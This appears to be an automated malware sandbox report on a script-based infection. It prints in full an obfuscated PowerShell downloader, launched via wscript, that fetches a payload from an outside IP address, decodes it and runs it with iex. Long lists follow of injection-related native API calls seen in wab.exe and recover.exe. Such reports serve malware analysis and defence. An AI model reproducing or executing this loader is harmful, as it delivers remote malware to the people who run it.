i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_1FDE2DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_1FDE2C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2B60 NtClose,LdrInitializeThunk, 10_2_1FDE2B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE35C0 NtCreateMutant,LdrInitializeThunk, 10_2_1FDE35C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2FE0 NtCreateFile, 10_2_1FDE2FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2F90 NtProtectVirtualMemory, 10_2_1FDE2F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2FB0 NtResumeThread, 10_2_1FDE2FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2FA0 NtQuerySection, 10_2_1FDE2FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2F60 NtCreateProcessEx, 10_2_1FDE2F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2F30 NtCreateSection, 10_2_1FDE2F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2EE0 NtQueueApcThread, 10_2_1FDE2EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2E80 NtReadVirtualMemory, 10_2_1FDE2E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2EA0 NtAdjustPrivilegesToken, 10_2_1FDE2EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2E30 NtWriteVirtualMemory, 10_2_1FDE2E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2DD0 NtDelayExecution, 10_2_1FDE2DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2DB0 NtEnumerateKey, 10_2_1FDE2DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE3D70 NtOpenThread, 10_2_1FDE3D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE3D10 NtOpenProcessToken, 10_2_1FDE3D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2D10 NtMapViewOfSection, 10_2_1FDE2D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2D00 NtSetInformationFile, 10_2_1FDE2D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2D30 NtUnmapViewOfSection, 10_2_1FDE2D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2CC0 NtQueryVirtualMemory, 10_2_1FDE2CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2CF0 NtOpenProcess, 10_2_1FDE2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2CA0 NtQueryInformationToken, 10_2_1FDE2CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2C60 NtCreateKey, 10_2_1FDE2C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2C00 NtQueryInformationProcess, 10_2_1FDE2C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2BF0 NtAllocateVirtualMemory, 10_2_1FDE2BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2BE0 NtQueryValueKey, 10_2_1FDE2BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2B80 NtQueryInformationFile, 10_2_1FDE2B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2BA0 NtEnumerateValueKey, 10_2_1FDE2BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2AD0 NtReadFile, 10_2_1FDE2AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2AF0 NtWriteFile, 10_2_1FDE2AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2AB0 NtWaitForSingleObject, 10_2_1FDE2AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE39B0 NtGetContextThread, 10_2_1FDE39B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE4650 NtSuspendThread, 10_2_1FDE4650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE4340 NtSetContextThread, 10_2_1FDE4340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE3090 NtSetValueKey, 10_2_1FDE3090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE3010 NtOpenDirectoryObject, 10_2_1FDE3010
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B4340 NtSetContextThread,LdrInitializeThunk, 13_2_034B4340
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B3090 NtSetValueKey,LdrInitializeThunk, 13_2_034B3090
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B4650 NtSuspendThread,LdrInitializeThunk, 13_2_034B4650
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B35C0 NtCreateMutant,LdrInitializeThunk, 13_2_034B35C0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2B60 NtClose,LdrInitializeThunk, 13_2_034B2B60
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2BE0 NtQueryValueKey,LdrInitializeThunk, 13_2_034B2BE0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_034B2BF0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2BA0 NtEnumerateValueKey,LdrInitializeThunk, 13_2_034B2BA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2AD0 NtReadFile,LdrInitializeThunk, 13_2_034B2AD0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2AF0 NtWriteFile,LdrInitializeThunk, 13_2_034B2AF0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B39B0 NtGetContextThread,LdrInitializeThunk, 13_2_034B39B0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2F30 NtCreateSection,LdrInitializeThunk, 13_2_034B2F30
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2FE0 NtCreateFile,LdrInitializeThunk, 13_2_034B2FE0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2FB0 NtResumeThread,LdrInitializeThunk, 13_2_034B2FB0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2EE0 NtQueueApcThread,LdrInitializeThunk, 13_2_034B2EE0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2E80 NtReadVirtualMemory,LdrInitializeThunk, 13_2_034B2E80
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2D10 NtMapViewOfSection,LdrInitializeThunk, 13_2_034B2D10
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_034B2D30
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2DD0 NtDelayExecution,LdrInitializeThunk, 13_2_034B2DD0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_034B2DF0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2C60 NtCreateKey,LdrInitializeThunk, 13_2_034B2C60
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_034B2C70
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2CA0 NtQueryInformationToken,LdrInitializeThunk, 13_2_034B2CA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B3010 NtOpenDirectoryObject, 13_2_034B3010
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2B80 NtQueryInformationFile, 13_2_034B2B80
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2AB0 NtWaitForSingleObject, 13_2_034B2AB0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2F60 NtCreateProcessEx, 13_2_034B2F60
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2F90 NtProtectVirtualMemory, 13_2_034B2F90
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2FA0 NtQuerySection, 13_2_034B2FA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2E30 NtWriteVirtualMemory, 13_2_034B2E30
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2EA0 NtAdjustPrivilegesToken, 13_2_034B2EA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B3D70 NtOpenThread, 13_2_034B3D70
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2D00 NtSetInformationFile, 13_2_034B2D00
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B3D10 NtOpenProcessToken, 13_2_034B3D10
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2DB0 NtEnumerateKey, 13_2_034B2DB0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2C00 NtQueryInformationProcess, 13_2_034B2C00
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2CC0 NtQueryVirtualMemory, 13_2_034B2CC0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B2CF0 NtOpenProcess, 13_2_034B2CF0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D176A0 NtReadFile, 13_2_02D176A0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D17790 NtDeleteFile, 13_2_02D17790
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D17540 NtCreateFile, 13_2_02D17540
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D17830 NtClose, 13_2_02D17830
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D17980 NtAllocateVirtualMemory, 13_2_02D17980
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348BD882 2_2_00007FFD348BD882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348BCAD6 2_2_00007FFD348BCAD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34983DF6 2_2_00007FFD34983DF6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02D19710 5_2_02D19710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08101010 5_2_08101010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08100CC8 5_2_08100CC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_081018E0 5_2_081018E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA2FC8 10_2_1FDA2FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBCFE0 10_2_1FDBCFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6FFB1 10_2_1FE6FFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24F40 10_2_1FE24F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD0F30 10_2_1FDD0F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6FF09 10_2_1FE6FF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF2F28 10_2_1FDF2F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6EEDB 10_2_1FE6EEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC2E90 10_2_1FDC2E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB9EB0 10_2_1FDB9EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6CE93 10_2_1FE6CE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0E59 10_2_1FDB0E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6EE26 10_2_1FE6EE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFDC0 10_2_1FDCFDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAADE0 10_2_1FDAADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC8DBF 10_2_1FDC8DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE67D73 10_2_1FE67D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE61D5A 10_2_1FE61D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBAD00 10_2_1FDBAD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6FCF2 10_2_1FE6FCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0CF2 10_2_1FDA0CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE29C32 10_2_1FE29C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 10_2_1FDB0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE25BF0 10_2_1FE25BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDEDBF9 10_2_1FDEDBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE66BD7 10_2_1FE66BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFB80 10_2_1FDCFB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6FB76 10_2_1FE6FB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6AB40 10_2_1FE6AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5DAC6 10_2_1FE5DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4DAAC 10_2_1FE4DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF5AA0 10_2_1FDF5AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE23A6C 10_2_1FE23A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE67A46 10_2_1FE67A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6FA49 10_2_1FE6FA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE7A9A6 10_2_1FE7A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB29A0 10_2_1FDB29A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB9950 10_2_1FDB9950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCB950 10_2_1FDCB950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC6962 10_2_1FDC6962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDE8F0 10_2_1FDDE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB38E0 10_2_1FDB38E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD968B8 10_2_1FD968B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB2840 10_2_1FDB2840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBA840 10_2_1FDBA840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1D800 10_2_1FE1D800
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAC7C0 10_2_1FDAC7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6F7B0 10_2_1FE6F7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD4750 10_2_1FDD4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0770 10_2_1FDB0770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE616CC 10_2_1FE616CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCC6E0 10_2_1FDCC6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4D5B0 10_2_1FE4D5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE70591 10_2_1FE70591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE67571 10_2_1FE67571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0535 10_2_1FDB0535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5E4F6 10_2_1FE5E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE62446 10_2_1FE62446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA1460 10_2_1FDA1460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6F43F 10_2_1FE6F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE703E6 10_2_1FE703E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBE3F0 10_2_1FDBE3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF739A 10_2_1FDF739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9D34C 10_2_1FD9D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6A352 10_2_1FE6A352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6132D 10_2_1FE6132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE512ED 10_2_1FE512ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCB2C0 10_2_1FDCB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB52A0 10_2_1FDB52A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50274 10_2_1FE50274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE681CC 10_2_1FE681CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE701AA 10_2_1FE701AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBB1B0 10_2_1FDBB1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE7B16B 10_2_1FE7B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9F172 10_2_1FD9F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE516C 10_2_1FDE516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE38158 10_2_1FE38158
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0100 10_2_1FDA0100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4A118 10_2_1FE4A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6F0E0 10_2_1FE6F0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE670E9 10_2_1FE670E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB70C0 10_2_1FDB70C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5F0CC 10_2_1FE5F0CC
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353A352 13_2_0353A352
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0346D34C 13_2_0346D34C
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353132D 13_2_0353132D
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_035403E6 13_2_035403E6
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0348E3F0 13_2_0348E3F0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034C739A 13_2_034C739A
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03520274 13_2_03520274
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0349B2C0 13_2_0349B2C0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_035212ED 13_2_035212ED
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034852A0 13_2_034852A0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034B516C 13_2_034B516C
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0346F172 13_2_0346F172
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0354B16B 13_2_0354B16B
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03470100 13_2_03470100
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0351A118 13_2_0351A118
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_035381CC 13_2_035381CC
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0348B1B0 13_2_0348B1B0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_035401AA 13_2_035401AA
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034870C0 13_2_034870C0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0352F0CC 13_2_0352F0CC
